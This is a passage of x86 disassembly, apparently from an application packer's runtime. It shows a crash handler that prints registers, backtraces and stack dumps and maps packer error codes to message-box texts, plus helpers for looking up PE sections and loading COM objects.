mov ecx, [ebp+var_44]
cmp al, [ecx]
jnz short loc_499BD2
cmp [ebp+var_49], 0
jz short loc_499BCC
mov eax, [ebp+var_48]
mov al, [eax+1]
mov [ebp+var_4A], al
mov ecx, [ebp+var_44]
cmp al, [ecx+1]
jnz short loc_499BD2
add [ebp+var_48], 2
add [ebp+var_44], 2
cmp [ebp+var_4A], 0
jnz short loc_499B98
loc_499BCC: ; CODE XREF: sub_499A16+195�j
and [ebp+var_50], 0
jmp short loc_499BDA
; ---------------------------------------------------------------------------
loc_499BD2: ; CODE XREF: sub_499A16+18F�j
; sub_499A16+1A6�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_50], eax
loc_499BDA: ; CODE XREF: sub_499A16+1BA�j
mov eax, [ebp+var_50]
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jnz short loc_499BF5
mov eax, [ebp+var_30]
mov [ebp+var_58], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_58]
jmp short loc_499C08
; ---------------------------------------------------------------------------
loc_499BF5: ; CODE XREF: sub_499A16+30�j
; sub_499A16+6F�j ...
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_499C06
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_499C06: ; CODE XREF: sub_499A16+1E3�j
xor eax, eax
loc_499C08: ; CODE XREF: sub_499A16+1DD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_499A16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499C17 proc near ; CODE XREF: sub_48E2E0+3F8�p
push ebp
mov ebp, esp
push offset sub_499C27
call ds:dword_4A2790 ; SetUnhandledExceptionFilter
pop ebp
retn
sub_499C17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499C27 proc near ; CODE XREF: sub_496BD7+367�p
; sub_497B7F+3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset a__seh__0xXAt0x ; "__SEH__ 0x%x at 0x%x"
call sub_499726
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+98h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0BCh]
push offset aCs0x08xSs0x08x ; "CS :0x%08X SS :0x%08X DS :0x%08X"
call sub_499726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+8Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+90h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+94h]
push offset aEs0x08xFs0x08x ; "ES :0x%08X FS :0x%08X GS :0x%08X"
call sub_499726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
push offset aEax0x08xEdx0x0 ; "EAX:0x%08X EDX:0x%08X ECX:0x%08X"
call sub_499726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
push offset aEsp0x08xEbp0x0 ; "ESP:0x%08X EBP:0x%08X EIP:0x%08X"
call sub_499726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
push offset aEsi0x08xEdi0x0 ; "ESI:0x%08X EDI:0x%08X"
call sub_499726
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
call sub_49A18E
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, 11000000h
mov [ebp+var_8], eax
cmp [ebp+var_8], 16h
ja loc_499E67
mov eax, [ebp+var_8]
jmp ds:off_499E97[eax*4]
loc_499D8E: ; DATA XREF: _4:off_499E97�o
mov [ebp+var_4], offset aAssertionFaile ; "ASSERTION FAILED"
jmp loc_499E67
; ---------------------------------------------------------------------------
loc_499D9A: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499E9B�o
mov [ebp+var_4], offset aHasNoAccessToE ; "HAS NO ACCESS TO EXECUTABLE"
jmp loc_499E67
; ---------------------------------------------------------------------------
loc_499DA6: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499E9F�o
mov [ebp+var_4], offset aExecutableIsNo ; "EXECUTABLE IS NOT NT IMAGE"
jmp loc_499E67
; ---------------------------------------------------------------------------
loc_499DB2: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EC7�o
mov [ebp+var_4], offset aDynamicLibrary ; "DYNAMIC LIBRARY IS NOT NT IMAGE"
jmp loc_499E67
; ---------------------------------------------------------------------------
loc_499DBE: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EA3�o
mov [ebp+var_4], offset aExecutableCorr ; "EXECUTABLE CORRUPTED"
jmp loc_499E67
; ---------------------------------------------------------------------------
loc_499DCA: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EA7�o
mov [ebp+var_4], offset aPathIsVeryLong ; "PATH IS VERY LONG"
jmp loc_499E67
; ---------------------------------------------------------------------------
loc_499DD6: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EAB�o
mov [ebp+var_4], offset aCouldNotOpenBo ; "COULD NOT OPEN BOXFILE"
jmp loc_499E67
; ---------------------------------------------------------------------------
loc_499DE2: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EAF�o
mov [ebp+var_4], offset aReadBoxfileErr ; "READ BOXFILE ERROR"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499DEB: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EB3�o
mov [ebp+var_4], offset aBoxfileCorrupt ; "BOXFILE CORRUPTED"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499DF4: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EB7�o
mov [ebp+var_4], offset aFeatureIsNotIm ; "FEATURE IS NOT IMPLEMENTED"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499DFD: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EBB�o
mov [ebp+var_4], offset aOutOfMemory ; "OUT OF MEMORY"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E06: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EBF�o
mov [ebp+var_4], offset aWrappersTableB ; "WRAPPERS TABLE BROKEN"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E0F: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EC3�o
mov [ebp+var_4], offset aVirtualprote_0 ; "VIRTUALPROTECT BROKEN"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E18: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499ECB�o
mov [ebp+var_4], offset aCouldNotCreate ; "COULD NOT CREATE HEAP"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E21: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499ECF�o
mov [ebp+var_4], offset aHeapCorrupted ; "HEAP CORRUPTED"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E2A: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499ED7�o
mov [ebp+var_4], offset aDllCorrupted ; "DLL CORRUPTED"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E33: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EE7�o
mov [ebp+var_4], offset aInvalidCompres ; "INVALID COMPRESSION/ENCRYPTION ALGORITH"...
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E3C: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499ED3�o
mov [ebp+var_4], offset aPackedDllOrBox ; "PACKED DLL OR BOXFILE CORRUPTED"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E45: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EDB�o
mov [ebp+var_4], offset aHookingDllErro ; "HOOKING DLL ERROR"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E4E: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EDF�o
mov [ebp+var_4], offset aGetmodulenameE ; "GetModuleName ERROR"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E57: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EE3�o
mov [ebp+var_4], offset aBadFuulname ; "BAD FUULNAME"
jmp short loc_499E67
; ---------------------------------------------------------------------------
loc_499E60: ; CODE XREF: sub_499C27+160�j
; DATA XREF: _4:00499EEF�o
mov [ebp+var_4], offset aInvalidDllRelo ; "INVALID DLL RELOCATION"
loc_499E67: ; CODE XREF: sub_499C27+157�j
; sub_499C27+160�j ...
cmp [ebp+var_4], 0
jz short loc_499E8C
push 0
push 0
call ds:dword_4A27C4 ; ChangeDisplaySettingsA
push 10h
push ds:off_49F4F4
push [ebp+var_4]
push 0
call ds:dword_4A27D0 ; MessageBoxA
jmp short loc_499E90
; ---------------------------------------------------------------------------
loc_499E8C: ; CODE XREF: sub_499C27+244�j
xor eax, eax
jmp short locret_499E93
; ---------------------------------------------------------------------------
loc_499E90: ; CODE XREF: sub_499C27+263�j
push 1
pop eax
locret_499E93: ; CODE XREF: sub_499C27+267�j
leave
retn 4
sub_499C27 endp
; ---------------------------------------------------------------------------
off_499E97 dd offset loc_499D8E ; DATA XREF: sub_499C27+160�r
dd offset loc_499D9A
dd offset loc_499DA6
dd offset loc_499DBE
dd offset loc_499DCA
dd offset loc_499DD6
dd offset loc_499DE2
dd offset loc_499DEB
dd offset loc_499DF4
dd offset loc_499DFD
dd offset loc_499E06
dd offset loc_499E0F
dd offset loc_499DB2
dd offset loc_499E18
dd offset loc_499E21
dd offset loc_499E3C
dd offset loc_499E2A
dd offset loc_499E45
dd offset loc_499E4E
dd offset loc_499E57
dd offset loc_499E33
dd offset loc_499E67
dd offset loc_499E60
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499EF3 proc near ; CODE XREF: sub_49A18E+40�p
; sub_49A18E+83�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F550
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, offset dword_4A6A90
test eax, eax
jnz short loc_499F2E
mov eax, offset aBroken ; "!broken!"
jmp loc_49A006
; ---------------------------------------------------------------------------
loc_499F2E: ; CODE XREF: sub_499EF3+2F�j
mov ecx, 100h
xor eax, eax
mov edi, offset dword_4A6A90
rep stosd
and [ebp+var_4], 0
push 1Ch
lea eax, [ebp+var_40]
push eax
push [ebp+arg_0]
call ds:dword_4A27B0 ; VirtualQuery
test eax, eax
jnz short loc_499F78
push offset a0x08xUnknownUn ; "0x%08x:[unknown]:unknown"
push offset dword_4A6A90
call ds:dword_4A27D4 ; wsprintfA
pop ecx
pop ecx
mov [ebp+var_44], offset dword_4A6A90
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_44]
jmp loc_49A006
; ---------------------------------------------------------------------------
loc_499F78: ; CODE XREF: sub_499EF3+5E�j
lea eax, [ebp+var_40]
push eax
call sub_49A0EF
pop ecx
mov [ebp+var_20], eax
and [ebp+var_24], 0
and [ebp+var_1C], 0
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_0]
call sub_49A015
add esp, 10h
cmp [ebp+var_20], 0
jnz short loc_499FB1
mov [ebp+var_20], offset aUnknown ; "unknown"
loc_499FB1: ; CODE XREF: sub_499EF3+B5�j
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_20]
push [ebp+arg_0]
push offset a0x08xS03x08x ; "0x%08x:[%s]:(%03x:%08x)"
push offset dword_4A6A90
call ds:dword_4A27D4 ; wsprintfA
add esp, 18h
mov [ebp+var_48], offset dword_4A6A90
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_48]
jmp short loc_49A006
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
push [ebp+arg_0]
push offset aBroken0x08x ; "!broken!0x%08x:"
push offset dword_4A6A90
call ds:dword_4A27D4 ; wsprintfA
add esp, 0Ch
mov eax, offset dword_4A6A90
loc_49A006: ; CODE XREF: sub_499EF3+36�j
; sub_499EF3+80�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_499EF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A015 proc near ; CODE XREF: sub_499EF3+A9�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
mov eax, [ebp+arg_4]
mov eax, [eax+4]
mov ecx, [ebp+arg_4]
mov ecx, [ecx+4]
add ecx, [eax+3Ch]
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
sub ecx, [eax+4]
mov [ebp+var_C], ecx
and [ebp+var_4], 0
jmp short loc_49A058
; ---------------------------------------------------------------------------
loc_49A051: ; CODE XREF: sub_49A015:loc_49A0E5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_49A058: ; CODE XREF: sub_49A015+3A�j
mov eax, [ebp+var_10]
movzx eax, word ptr [eax+6]
cmp [ebp+var_4], eax
jnb loc_49A0EA
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+0Ch]
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_4]
imul ecx, 28h
mov edx, [ebp+var_8]
mov esi, [ebp+var_8]
mov eax, [edx+eax+10h]
cmp eax, [esi+ecx+8]
jbe short loc_49A0A6
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+10h]
mov [ebp+var_1C], eax
jmp short loc_49A0B6
; ---------------------------------------------------------------------------
loc_49A0A6: ; CODE XREF: sub_49A015+7D�j
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+8]
mov [ebp+var_1C], eax
loc_49A0B6: ; CODE XREF: sub_49A015+8F�j
mov eax, [ebp+var_18]
add eax, [ebp+var_1C]
mov [ebp+var_14], eax
mov eax, [ebp+var_C]
cmp eax, [ebp+var_18]
jb short loc_49A0E5
mov eax, [ebp+var_C]
cmp eax, [ebp+var_14]
jnb short loc_49A0E5
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+var_C]
sub eax, [ebp+var_18]
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_49A0EA
; ---------------------------------------------------------------------------
loc_49A0E5: ; CODE XREF: sub_49A015+B0�j
; sub_49A015+B8�j
jmp loc_49A051
; ---------------------------------------------------------------------------
loc_49A0EA: ; CODE XREF: sub_49A015+4D�j
; sub_49A015+CE�j
xor al, al
pop esi
leave
retn
sub_49A015 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A0EF proc near ; CODE XREF: sub_499EF3+89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push edi
push 41h
pop ecx
xor eax, eax
mov edi, offset dword_4A6E90
rep stosd
push 104h
push offset dword_4A6E90
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
call ds:dword_4A2714 ; GetModuleFileNameA
test eax, eax
jnz short loc_49A11F
xor eax, eax
jmp short loc_49A18B
; ---------------------------------------------------------------------------
loc_49A11F: ; CODE XREF: sub_49A0EF+2A�j
push 5Ch
push offset dword_4A6E90
call sub_48D700
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_49A13C
mov eax, [ebp+var_4]
inc eax
jmp short loc_49A18B
; ---------------------------------------------------------------------------
loc_49A13C: ; CODE XREF: sub_49A0EF+45�j
mov edi, offset dword_4A6E90
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push 50h
pop eax
cmp eax, ecx
sbb eax, eax
neg eax
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_49A186
mov eax, [ebp+var_8]
mov ds:byte_4A6E40[eax], 2Eh
mov eax, [ebp+var_8]
mov ds:byte_4A6E41[eax], 2Eh
mov eax, [ebp+var_8]
mov ds:byte_4A6E42[eax], 2Eh
mov eax, [ebp+var_8]
lea eax, byte_4A6E40[eax]
jmp short loc_49A18B
; ---------------------------------------------------------------------------
loc_49A186: ; CODE XREF: sub_49A0EF+6C�j
mov eax, offset dword_4A6E90
loc_49A18B: ; CODE XREF: sub_49A0EF+2E�j
; sub_49A0EF+4B�j ...
pop edi
leave
retn
sub_49A0EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A18E proc near ; CODE XREF: sub_499C27+132�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F560
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset aBacktrace ; "-- backtrace --"
call sub_499726
pop ecx
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_499EF3
pop ecx
push eax
push offset aS_7 ; " %s"
call sub_499726
pop ecx
pop ecx
and [ebp+var_20], 0
jmp short loc_49A1F6
; ---------------------------------------------------------------------------
loc_49A1E7: ; CODE XREF: sub_49A18E+96�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [ebp+var_1C], eax
loc_49A1F6: ; CODE XREF: sub_49A18E+57�j
cmp [ebp+var_20], 40h
jnb short loc_49A226
cmp [ebp+var_1C], 0
jz short loc_49A226
mov eax, [ebp+var_1C]
cmp dword ptr [eax+4], 0
jz short loc_49A226
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call sub_499EF3
pop ecx
push eax
push offset aS_7 ; " %s"
call sub_499726
pop ecx
pop ecx
jmp short loc_49A1E7
; ---------------------------------------------------------------------------
loc_49A226: ; CODE XREF: sub_49A18E+6C�j
; sub_49A18E+72�j ...
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_49A242
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
push offset a___OpssBrokenB ; " ... opss, broken by SEH"
call sub_499726
pop ecx
or [ebp+var_4], 0FFFFFFFFh
loc_49A242: ; CODE XREF: sub_49A18E+9C�j
push offset aStack ; "--stack--"
call sub_499726
pop ecx
mov eax, [ebp+arg_8]
mov [ebp+var_1C], eax
mov [ebp+var_4], 1
and [ebp+var_24], 0
jmp short loc_49A267
; ---------------------------------------------------------------------------
loc_49A260: ; CODE XREF: sub_49A18E+10F�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_49A267: ; CODE XREF: sub_49A18E+D0�j
cmp [ebp+var_24], 8
jnb short loc_49A29F
mov eax, [ebp+var_1C]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
mov eax, [ebp+var_1C]
push dword ptr [eax]
push [ebp+var_1C]
push offset a0x08x0x08x0x08 ; "0x%08x: 0x%08x 0x%08x 0x%08x 0x%08x"
call sub_499726
add esp, 18h
mov eax, [ebp+var_1C]
add eax, 10h
mov [ebp+var_1C], eax
jmp short loc_49A260
; ---------------------------------------------------------------------------
loc_49A29F: ; CODE XREF: sub_49A18E+DD�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_49A2BB
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
push offset a___OpssBrokenB ; " ... opss, broken by SEH"
call sub_499726
pop ecx
or [ebp+var_4], 0FFFFFFFFh
loc_49A2BB: ; CODE XREF: sub_49A18E+115�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_49A18E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A2CA proc near ; CODE XREF: sub_49063E+64�p
; sub_49253F+2AF�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
and [ebp+var_8], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+1]
push eax
call sub_49935A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
inc ecx
mov esi, [ebp+arg_0]
mov edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
pop edi
pop esi
leave
retn
sub_49A2CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A31F proc near ; CODE XREF: sub_49A3B3+1F�p
; sub_49A8C0+40�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
and eax, 1
test eax, eax
jnz short loc_49A336
mov eax, 80004005h
jmp short locret_49A3B1
; ---------------------------------------------------------------------------
loc_49A336: ; CODE XREF: sub_49A31F+E�j
push [ebp+arg_0]
call sub_493D50
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_49A3AC
push 8
pop edx
mov ecx, [ebp+var_4]
call sub_4971E1
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_49A36C
mov eax, [ebp+arg_14]
mov dword ptr [eax], 80004005h
mov eax, 80004005h
jmp short locret_49A3B1
; ---------------------------------------------------------------------------
loc_49A36C: ; CODE XREF: sub_49A31F+3B�j
and [ebp+var_C], 0
push offset aDllgetclassobj ; "DllGetClassObject"
push [ebp+var_8]
call ds:dword_4A2728 ; GetProcAddress
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_49A397
mov eax, [ebp+arg_14]
mov dword ptr [eax], 80004005h
mov eax, 80004005h
jmp short locret_49A3B1
; ---------------------------------------------------------------------------
loc_49A397: ; CODE XREF: sub_49A31F+66�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call [ebp+var_C]
mov ecx, [ebp+arg_14]
mov [ecx], eax
xor eax, eax
jmp short locret_49A3B1
; ---------------------------------------------------------------------------
loc_49A3AC: ; CODE XREF: sub_49A31F+27�j
mov eax, 80004005h
locret_49A3B1: ; CODE XREF: sub_49A31F+15�j
; sub_49A31F+4B�j ...
leave
retn
sub_49A31F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A3B3 proc near ; CODE XREF: sub_49A518+53�p
; sub_49A789+43�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 1Ch
and [ebp+var_4], 0
push [ebp+arg_18]
lea eax, [ebp+var_4]
push eax
push offset dword_4A21D8
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_49A31F
add esp, 18h
test eax, eax
jl loc_49A511
mov eax, [ebp+arg_18]
cmp dword ptr [eax], 0
jge short loc_49A3F4
mov eax, [ebp+arg_18]
mov eax, [eax]
jmp locret_49A516
; ---------------------------------------------------------------------------
loc_49A3F4: ; CODE XREF: sub_49A3B3+35�j
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_14], 0
and [ebp+var_8], 0
lea eax, [ebp+var_8]
push eax
push offset dword_4A21C8
push [ebp+arg_4]
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+0Ch]
test eax, eax
jl loc_49A4BB
and [ebp+var_18], 0
jmp short loc_49A430
; ---------------------------------------------------------------------------
loc_49A429: ; CODE XREF: sub_49A3B3+F8�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_49A430: ; CODE XREF: sub_49A3B3+74�j
mov eax, [ebp+var_18]
cmp eax, [ebp+arg_10]
jnb short loc_49A4B0
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
lea eax, [ecx+eax+4]
push eax
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
push dword ptr [ecx+eax]
mov eax, [ebp+var_8]
mov eax, [eax]
push [ebp+var_8]
call dword ptr [eax]
mov ecx, [ebp+var_18]
imul ecx, 0Ch
mov edx, [ebp+arg_14]
mov [edx+ecx+8], eax
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
cmp dword ptr [ecx+eax+8], 0
jl short loc_49A47F
mov [ebp+var_C], 1
jmp short loc_49A49C
; ---------------------------------------------------------------------------
loc_49A47F: ; CODE XREF: sub_49A3B3+C4�j
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
cmp dword ptr [ecx+eax+8], 80004002h
jnz short loc_49A498
mov [ebp+var_10], 1
jmp short loc_49A49C
; ---------------------------------------------------------------------------
loc_49A498: ; CODE XREF: sub_49A3B3+DD�j
mov [ebp+var_14], 1
loc_49A49C: ; CODE XREF: sub_49A3B3+CA�j
; sub_49A3B3+E3�j
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
mov eax, [ecx+eax]
mov [ebp+var_1C], eax
jmp loc_49A429
; ---------------------------------------------------------------------------
loc_49A4B0: ; CODE XREF: sub_49A3B3+83�j
mov eax, [ebp+var_8]
mov eax, [eax]
push [ebp+var_8]
call dword ptr [eax+8]
loc_49A4BB: ; CODE XREF: sub_49A3B3+6A�j
movzx eax, [ebp+var_14]
test eax, eax
jz short loc_49A4CE
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80004005h
jmp short loc_49A502
; ---------------------------------------------------------------------------
loc_49A4CE: ; CODE XREF: sub_49A3B3+10E�j
movzx eax, [ebp+var_C]
test eax, eax
jz short loc_49A4E9
movzx eax, [ebp+var_10]
test eax, eax
jz short loc_49A4E9
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80012h
jmp short loc_49A502
; ---------------------------------------------------------------------------
loc_49A4E9: ; CODE XREF: sub_49A3B3+121�j
; sub_49A3B3+129�j
movzx eax, [ebp+var_C]
test eax, eax
jz short loc_49A4F9
mov eax, [ebp+arg_18]
and dword ptr [eax], 0
jmp short loc_49A502
; ---------------------------------------------------------------------------
loc_49A4F9: ; CODE XREF: sub_49A3B3+13C�j
